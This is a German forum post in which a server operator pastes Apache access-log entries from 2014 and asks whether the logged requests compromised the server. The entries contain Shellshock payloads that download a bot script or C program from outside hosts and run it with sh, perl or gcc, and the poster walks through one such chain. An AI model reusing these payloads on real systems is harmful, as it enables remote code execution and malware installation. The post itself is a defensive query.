Programm über GET / HTTP { :;}; /bin/bash
Hallo, nur mal eine kurze Meinung von euch ist mir wichtig.
Frage was das Programm bewirken soll.
other_vhosts_access.log
other_vhosts_access.log .net:80 anonymisiert.no - - [28/Sep/2014:14:41:00 +0200] "GET / HTTP/1.0" 200 664 "-" "() { :;}; /bin/bash -c \"wget http://anonymisiert.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://anonymisiert.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh\"" .net:80 x.x.x.x - - [28/Sep/2014:17:36:07 +0200] "GET / HTTP/1.1" 200 645 "-" "() { :;}; /bin/bash -c \"wget http://x.x.x.x/bash-count.txt\"" .net:80 anonymisiert.com - - [29/Sep/2014:05:32:50 +0200] "GET /cgi-bin/hi HTTP/1.0" 403 399 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://x.x.x.x/ji;curl -O /tmp/ji http://x.x.x.x/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\"" .net:80 anonymisiert.com - - [01/Oct/2014:10:22:06 +0200] "GET /cgi-bin/hi HTTP/1.0" 403 399 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://x.x.x.x/ji;curl -O /tmp/ji http://x.x.x.x/ji ; perl /tmp/ji;rm -rf /tmp/ji\"" .net:80 x.x.x.x - - [04/Oct/2014:12:53:12 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 411 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget https://x.x.x.x/user --no-check-certificate;curl -O https://x.x.x.x/user -k ; perl /tmp/user;rm -rf /tmp/user\""
Die ersten 2 sind mit 200 Durchgekommen, was die COds 664 645 bedeuten könnt ihr mir bestimmt sagen?
Der 2 Eintrag scheint eine ein Sicherheit Statistik Abfrage zu sein, wo ich mich melden soll falls ich die Datei gefunden habe.
Die Letzten drei Code ;403; 404 also kein Problem
der Eintrag in der URL vom log an erster Stelle. hxxp://anonymisiert.us/bots/regular.bot
wget http://x.x.x.x/manual/a.c -O /tmp/a.c; gcc -o /tmp/.a /tmp/a.c; chmod +x /tmp/.a; /tmp/.a; rm -rf /tmp/.a;
die meisten wissen was das bewirkt, aber für die andern; Zeile für Zeile
Datei a.c Runterladen und in /tmp/ stecken
Daraus ein Programm machen von a.c wird .a (versteckt )
Rechte zum Ausfuhren
Starten
Löschen
Folgendes ist in der a.c hxxp://x.x.x.x/manual/a.c
Kann mir jemand sagen ob das Programm bei mir ausgefuhrt worden ist, je nach dem was 664 im log bedeutet Was macht das Programm überhaupt???
Bearbeitet von jug:
Einigen zweifelhaften Code und IP-Adressen und Domains entfernt und anonymisiert.